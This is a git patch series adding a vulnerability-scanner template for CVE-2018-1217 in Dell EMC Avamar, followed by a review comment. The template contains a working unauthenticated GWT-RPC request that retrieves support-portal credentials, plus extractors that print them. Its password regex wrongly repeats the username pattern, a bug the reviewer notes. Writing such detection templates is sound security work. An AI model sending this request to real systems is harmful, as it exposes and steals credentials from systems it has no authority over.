From 2fe61c41998e660cdb366a469878c9123cc7ccb3 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Mon, 29 Sep 2025 00:59:15 +0700
Subject: [PATCH 1/3] Add CVE-2018-1217 (vKEV)
---
 http/cves/2018/CVE-2018-1217.yaml | 61 +++++++++++++++++++++++++++++++
 1 file changed, 61 insertions(+)
 create mode 100644 http/cves/2018/CVE-2018-1217.yaml
diff --git a/http/cves/2018/CVE-2018-1217.yaml b/http/cves/2018/CVE-2018-1217.yaml
new file mode 100644
index 000000000000..81b8b8018218
--- /dev/null
+++ b/http/cves/2018/CVE-2018-1217.yaml
@@ -0,0 +1,61 @@
+id: CVE-2018-1217
+
+info:
+ name: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control
+ author: daffainfo
+ severity: critical
+ description: |
+ Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials.
+ reference:
+ - https://www.exploit-db.com/exploits/44441
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-1217
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2018-1217
+ cwe-id: CWE-862
+ cpe: cpe:2.3:a:dell:emc_avamar:*:*:*:*:*:*:*:*, cpe:2.3:a:dell:emc_integrated_data_protection_appliance:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: dell
+ product: emc_avamar,emc_integrated_data_protection_appliance
+ shodan-query: title:"AVAMAR"
+ tags: cve,cve2018,dell,avamar,vkev
+
+http:
+ - raw:
+ - |
+ POST /avi/avigui/avigwt HTTP/1.1
+ Host: {{Hostname}}
+ X-Gwt-Permutation: {{randstr}}
+ X-Gwt-Module-Base: https://{{Hostname}}/avi/avigui/
+ Content-Type: text/x-gwt-rpc; charset=UTF-8
+
+ 7|0|6|https://{{Hostname}}/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|{{Hostname}}|1|2|3|4|2|5|5|6|0|
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains_all(body, "//OK", "emcsupportUsername", "emcsupportPassword")'
+ - 'status_code == 200'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: username
+ group: 1
+ internal: true
+ regex:
+ - 'emcsupportUsername\\":\\"(.*?)\\"'
+
+ - type: regex
+ name: password
+ group: 1
+ internal: true
+ regex:
+ - 'emcsupportUsername\\":\\"(.*?)\\"'
+
+ - type: dsl
+ dsl:
+ - '"Username: " + username + ". Password: " + password'
From 1c453bebde6a4654e64c4bc266b3d71554a07020 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Mon, 29 Sep 2025 23:45:16 +0530
Subject: [PATCH 2/3] Update CVE-2018-1217.yaml
---
 http/cves/2018/CVE-2018-1217.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/cves/2018/CVE-2018-1217.yaml b/http/cves/2018/CVE-2018-1217.yaml
index 81b8b8018218..a08cd7b663f8 100644
--- a/http/cves/2018/CVE-2018-1217.yaml
+++ b/http/cves/2018/CVE-2018-1217.yaml
@@ -21,7 +21,7 @@ info:
 vendor: dell
 product: emc_avamar,emc_integrated_data_protection_appliance
 shodan-query: title:"AVAMAR"
- tags: cve,cve2018,dell,avamar,vkev
+ tags: cve,cve2018,dell,avamar,kev,vkev
 
 http:
 - raw:
From 7a4f8779cadd8b61f5dd47b60d79c80dee3bfb70 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Mon, 29 Sep 2025 23:50:02 +0530
Subject: [PATCH 3/3] Update CVE-2018-1217.yaml
---
 http/cves/2018/CVE-2018-1217.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/cves/2018/CVE-2018-1217.yaml b/http/cves/2018/CVE-2018-1217.yaml
index a08cd7b663f8..243bb2bd73d6 100644
--- a/http/cves/2018/CVE-2018-1217.yaml
+++ b/http/cves/2018/CVE-2018-1217.yaml
@@ -58,4 +58,4 @@ http:
 
 - type: dsl
 dsl:
- - '"Username: " + username + ". Password: " + password'
+ - '"Username: " + username + " Password: " + password'
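Review bot: In PATCH 1/3 the `password` extractor repeats the username pattern (`emcsupportUsername\\":\\"(.*?)\\"`), so the final DSL extractor reports the username in both fields; its regex should key on `emcsupportPassword`, the field the matcher already checks for. PATCH 3/3 edits the same output line but leaves this regex unchanged. Because the matcher alone is enough to show the missing access check, consider reporting only the username (or a fixed marker) so that scan results and CI logs do not end up storing a working Dell EMC Online Support credential. Separately, `X-Gwt-Module-Base` and the RPC payload hard-code `https://{{Hostname}}`; `{{RootURL}}` would follow the scheme of the target actually being scanned.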